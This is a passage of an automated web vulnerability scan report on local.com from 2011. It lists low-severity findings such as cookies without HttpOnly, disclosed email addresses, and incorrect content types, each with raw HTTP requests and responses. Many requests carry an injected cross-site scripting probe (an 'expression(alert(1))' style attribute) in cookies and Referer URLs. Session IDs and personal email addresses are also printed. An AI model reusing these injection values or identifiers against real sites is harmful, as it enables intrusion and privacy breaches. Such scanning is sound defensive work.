SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:48 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No photo specified

10.42. http://www.local.com/ver1.0/ReviewPage.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/ReviewPage.app

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:01:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 616

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,

...[SNIP]...

10.43. http://www.local.com/ver1.0/Video/Upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Video/Upload

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:49 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No video specified

11. Email addresses disclosed previous next
There are 5 instances of this issue:

/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/v3/js/globalbusiness_3_5.js
/js/s_code.js
/privacy/
/terms/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

11.1. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following email address was disclosed in the response:

rev.thompson@cetproducts.net

Request

Response

11.2. http://www.local.com/business/v3/js/globalbusiness_3_5.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/v3/js/globalbusiness_3_5.js

Issue detail

The following email address was disclosed in the response:

kueck@local.com

Request

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26246
Expires: Thu, 03 Feb 2011 23:17:16 GMT
Date: Thu, 03 Feb 2011 15:59:50 GMT
Connection: close
Content-Length: 477751

ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
dateUserInfo');if(!Environment.PluckUser.LoggedIn){dash.ExpandDash();return false;}
if(!opt)return false;var debug=false;var debugWipeExtendedProfile=((debug)&&(Environment.PluckUser.Username.indexOf("kueck@local.com")>
...[SNIP]...

11.3. http://www.local.com/js/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/js/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /js/s_code.js HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "1cfb478e197fb5e7142cfaf9d58bac51"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26105
Expires: Thu, 03 Feb 2011 23:15:02 GMT
Date: Thu, 03 Feb 2011 15:59:57 GMT
Connection: close
Content-Length: 20798

var s=s_gi(s_account)
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,ppt,pptx"
s.linkIntern
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

11.4. http://www.local.com/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The following email addresses were disclosed in the response:

clientservices@local.com
privacy@local.com

Request

Response

11.5. http://www.local.com/terms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The following email address was disclosed in the response:

customerservice@local.com

Request

Response

12. HTML does not specify charset previous next
There are 6 instances of this issue:

/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)
/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)
/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)
/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)
/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)
/ver1.0/ReviewPage.app

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

12.1. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)

Request

GET /business/details/dallas-tx/amegy-bank-97648000/javascript:void(0) HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Date: Thu, 03 Feb 2011 16:37:20 GMT
Connection: close

Bad Request

12.2. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0) HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:36:28 GMT
Connection: close

Bad Request

12.3. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)

Request

GET /business/details/dallas-tx/equity-bank-63975058/javascript:void(0) HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:36:32 GMT
Connection: close

Bad Request

12.4. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)

Request

GET /business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0) HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:36:35 GMT
Connection: close

Bad Request

12.5. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)

Request

GET /business/details/dallas-tx/sterling-bank-16856575/javascript:void(0) HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:36:58 GMT
Connection: close

Bad Request

12.6. http://www.local.com/ver1.0/ReviewPage.app previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/ReviewPage.app

Request

GET /ver1.0/ReviewPage.app HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: private
Content-Type: text/html
Vary: Content-Encoding
Date: Thu, 03 Feb 2011 16:49:54 GMT
Content-Length: 45
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

Missing expected parameter in request: onPage

13. Content type incorrectly stated previous
There are 7 instances of this issue:

/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)
/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)
/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)
/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)
/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)
/business/skins/default/images/locm_transhadow_v001.jpg
/ver1.0/ReviewPage.app

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

13.1. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/javascript:void(0)

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 11
Date: Thu, 03 Feb 2011 16:37:20 GMT
Connection: close

Bad Request

13.2. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/javascript:void(0)

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

13.3. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/javascript:void(0)

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

13.4. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/javascript:void(0)

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

13.5. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0) previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/javascript:void(0)

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

13.6. http://www.local.com/business/skins/default/images/locm_transhadow_v001.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/business/skins/default/images/locm_transhadow_v001.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /business/skins/default/images/locm_transhadow_v001.jpg HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; session_start_time=1296748820317; k_visit=1

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Tue, 01 Feb 2011 17:31:10 GMT
Accept-Ranges: bytes
ETag: "5893c6d035c2cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 984
Date: Thu, 03 Feb 2011 15:59:58 GMT
Connection: close

.PNG
.
...IHDR.............N..>....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

13.7. http://www.local.com/ver1.0/ReviewPage.app previous

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.local.com
Path:	/ver1.0/ReviewPage.app

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 13:04:36 CST 2011.